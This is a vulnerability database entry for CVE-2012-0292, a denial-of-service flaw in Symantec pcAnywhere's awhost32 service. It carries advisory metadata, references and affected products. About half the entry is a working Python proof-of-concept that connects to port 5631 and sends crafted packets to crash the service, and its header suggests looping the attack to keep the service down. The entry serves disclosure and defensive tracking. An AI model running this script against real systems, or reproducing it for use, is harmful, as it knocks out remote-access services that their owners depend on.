Symantec pcAnywhere Input Validation Vulnerability

Vulnerability ID: 1120900; Vulnerability type: Input validation
Published: 2012-02-17; Updated: 2012-04-09
CVE ID: CVE-2012-0292; CNNVD-ID: CNNVD-201203-081
Platform: Windows; CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/18493
https://www.securityfocus.com/bid/52094
https://cxsecurity.com/issue/WLB-2012030062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-081
|Vulnerability details
Symantec pcAnywhere is a remote control software product. A vulnerability exists in the awhost32 service in Symantec pcAnywhere from the initial release through version 12.5.3, Altiris IT Management Suite pcAnywhere Solution 7.0 (also known as 12.5.x) and 7.1 (also known as 12.6.x), and Altiris Deployment Solution Remote pcAnywhere Solution 7.1 (also known as 12.5.x and 12.6.x). A remote attacker can exploit it with a crafted TCP session on port 5631 to cause a denial of service (daemon crash).
|Exploit (EXP)
#!/usr/bin/python

'''
Exploit Title:  PCAnywhere Nuke 
Date: 2/16/12
Author: Johnathan Norman  spoofy <at> exploitscience.org  or @spoofyroot
Version:  PCAnyWhere  (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my initial impressions
are that controlling execution will be a pain.
'''

import sys
import socket
import argparse


if len(sys.argv) != 2:
    print "[+] Usage: ./pcNuke.py <HOST>"
    sys.exit(1)
HOST = sys.argv[1]
PORT = 5631              
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

    
# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)


# ACK! 
s.send("\x6f\x06\xfe")
buf = s.recv(1024)


# Auth capability part 1 
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
# Auth capability part 2
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
|Affected products
Symantec Remote pcAnywhere Solution 12.6 + Symantec Altiris Client Management Suite 7 + Symantec Altiris Deployment Solution 7.1
|References

Source: www.symantec.com
Link: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120301_00
Source: BID
Name: 52094
Link: http://www.securityfocus.com/bid/52094
Source: EXPLOIT-DB
Name: 18493
Link: http://www.exploit-db.com/exploits/18493/